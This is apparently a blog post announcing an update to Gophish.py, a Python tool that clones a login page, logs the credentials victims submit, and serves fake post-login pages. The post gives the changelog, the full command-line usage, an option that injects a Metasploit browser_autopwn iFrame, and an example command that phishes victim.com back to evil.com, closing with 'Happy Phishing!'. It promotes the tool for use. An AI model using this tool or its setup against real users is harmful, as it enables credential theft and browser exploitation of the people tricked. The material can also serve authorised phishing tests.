Gophishing Update – Enhanced Clickthrough and More

I’ve released a new version of Gophish.py. The update includes:

  • Fixed a bug in rewriting the method attribute in phished forms
  • Fixed a bug with GET based forms
  • Fixed a bug in the autofill option, fixed the demo/sample file accordingly
  • Fixed a bug where links were rewritten when using ‘javascript:…’
  • Fixed some bugs regarding correctly closing files
  • Added in functionality to reverse BeautifulSoup fixing &amp to &
  • Added functionality to rewrite ‘url(www.example.com)’ in CSS
  • Added functionality to handle onsubmit/onkeypress/onclick attributes in FORM/INPUT tags
  • Added a feature to pass a user agent header when connecting to the target
  • Added a feature to send cookies
  • Added a feature to serve a click through page post form submission
  • Added clickable feature to provide more click through pages post submission and initial click through

Quite a few bugs were fixed, one of which has been around from the beginning. In some cases, the METHOD attribute of FORM tags wasn’t correctly rewritten, breaking form submission functionality.

Besides the bug above that has existed for some time, I also fixed some bugs introduced by more recent versions of the script. The code was restructured in a fairly early release and at that time forms using the METHOD attribute of ‘GET’ were broken. The code has been updated to implement redirection in a consistent way, by redirecting to an HTML page with a form that is autosubmitted to the phish site with JavaScript. This form is auto-generated based on the submitted form values.

I updated the code to use ‘soup.prettify(formatter=”html”)’ in order to fix some issues with bad characters and HTML. This broke the autofill functionality. I have now updated that functionality as well as the sample file.

I also updated the link rewriting functionality to ignore links using ‘javascript:…’ These were stupidly rewritten to ‘replacementurl/javascript:…’ in the past versions.

In some cases, files opened by gophish weren’t correctly closed, which broke the script after the first initial connection. This is now fixed.

The first “feature” I added is more of a fix. BeautifulSoup, when using ‘formatter=”html”‘, tries to fix bad HTML by closing out some tags, changing &’s to &amp, < to &lt, and > to &gt. The last two are fine, but the &amp fix seems to more often result in &nbsp’s being printed on HTML pages because they are rewritten as &ampnbsp. I now re-fix this after BeautifulSoup does its thing.

The next functionality enhancement involves rewriting CSS within the page that includes ‘url(www.example.com)’ code. This will now get rewritten to point at the correct URL if instead the value is something like ‘url(/path/to/file)’.

In addition, I also added some functionality to prevent onsubmit/onkeypress/onclick attributes within FORM/INPUT tags that in some cases break form submissions. Those are now rewritten to be empty.

Now the fun stuff; features. The first feature seems like a no-brainer. You can now pass a file containing a ‘User-Agent’ header to gophish. The new option is ‘–useragent filename.txt’, assuming the user agent file you are using is named ‘filename.txt’. This will resolve issues in which the site responds back with a “Browser not supported” page instead of the correct phishing page based on the user agent sent by Python.

The next feature is simple and I am unsure if it will ever be necessary. In some cases, a site might check for JavaScript being enabled by setting a cookie and then validating a cookie has in fact been set. If JavaScript is disabled, then the page might respond differently. There is now a ‘–sendcookies’ option to resolve this potential problem. This option causes gophish to make an initial connection to the page, grab the cookies, and then make a second request adding the cookies to the HTTP header.

Now for the fun stuff. I’ve added in real click through support with new options. The first option is ‘–clickthrough clickpage.html’, assuming the first click through page you want to use is named ‘clickpage.html’. This changes the functionality for gophish where instead of logging submitted form values and redirecting to the real page (and submitting the form values to the real page), it will open the ‘clickpage.html’ file. So you can have the initial phish page and then have a secondary fake post login page for example.

The next option, ‘–clickable’, builds on this functionality. You can provide additional html files, comma delimited, that are opened based on their name. So, if you passed in ‘–clickthrough clickpage.html –clickable page1.html,page2.html,page3.html’ for example, the flow would be:

  1. User accesses initial phish page, fills in form data, and submits
  2. Submitted data is logged and then user is served ‘clickpage.html’
  3. If ‘clickpage.html’ also has a form with an action of ‘page1.html’ and the user submitted the form then they would then be served ‘page1.html’, which was provided with the ‘–clickable’ option.
  4. Or, if there are other links for the user to click on with an href=’page2.html’ and href=’page3.html’, then if the user clicks on one of these links, they will be served the respective page

These new features greatly enhance the functionality of your phishing page while remaining simple to use and implement. I hope someone out there finds them useful.

The new version of the code can be found here. The updated autofill sample file can be found here. A sample user agent file can be found here.

Updated usage information for the script:

  usage: gophish.py [-h] --phish PHISH --replace REPLACE [--logfile LOGFILE]
                  [--listen LISTEN] [--port PORT] [--ssl]
                  [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY]
                  [--autopwn AUTOPWN] [--autofill AUTOFILL]
                  [--redirect REDIRECT] [--redirectto REDIRECTTO]
                  [--landing LANDING] [--clickthrough CLICKTHROUGH]
                  [--clickable CLICKABLE] [--useragent USERAGENT]
                  [--sendcookies]

  Automatically setup a phishing site.

  optional arguments:
    -h, --help            show this help message and exit
    --phish PHISH         the full URL to phish back to the victim (must include
                          http(s)://) (default: None)
    --replace REPLACE     the IP/FQDN to replace FORM actions with (must include
                          http(s):// and final /) (default: None)
    --logfile LOGFILE     log file to store submitted form values (default:
                          phishlog.txt)
    --listen LISTEN       the IP to bind to (default: 0.0.0.0)
    --port PORT           the port to start the listening web server on
                          (default: 80)
    --ssl                 enable SSL on the running port (default: 0)
    --sslchain SSLCHAIN   certificate chain file to use when ssl option is
                          enabled (default: chain.crt)
    --sslcert SSLCERT     certificate file to use to use when ssl option is
                          enabled (default: ssl.crt)
    --sslkey SSLKEY       private key file to use to use when ssl option is
                          enabled (default: ssl.key)
    --autopwn AUTOPWN     Metasploit auxiliary/server/browser_autopwn URL to
                          inject as an iFrame (default: None)
    --autofill AUTOFILL   file to use to autosubmit autocomplete fields
                          (default: None)
    --redirect REDIRECT   redirect requests for this address somewhere else
                          (default: None)
    --redirectto REDIRECTTO
                          redirect requests in the redirect option to this
                          address (full link, must include http(s)://) (default:
                          www.google.com)
    --landing LANDING     redirect to this landing page instead of original site
                          after form is submitted (include full link) (default:
                          None)
    --clickthrough CLICKTHROUGH
                          file to serve up after user enters form credentials on
                          main phish page (default: None)
    --clickable CLICKABLE
                          used in combination with clickthrough, comma separated
                          list of files to serve based on requested name
                          (default: None)
    --useragent USERAGENT
                          file to use to pass a user agent value in the request
                          (default: None)
    --sendcookies         initiate a connection, get the cookies, send cookies
                          back in second connection (default: 1)

  Example: gophish.py --phish https://www.victim.com/login.php --replace
    https://www.evil.com --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt
    --sslkey ssl.key

 
Happy Phishing!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: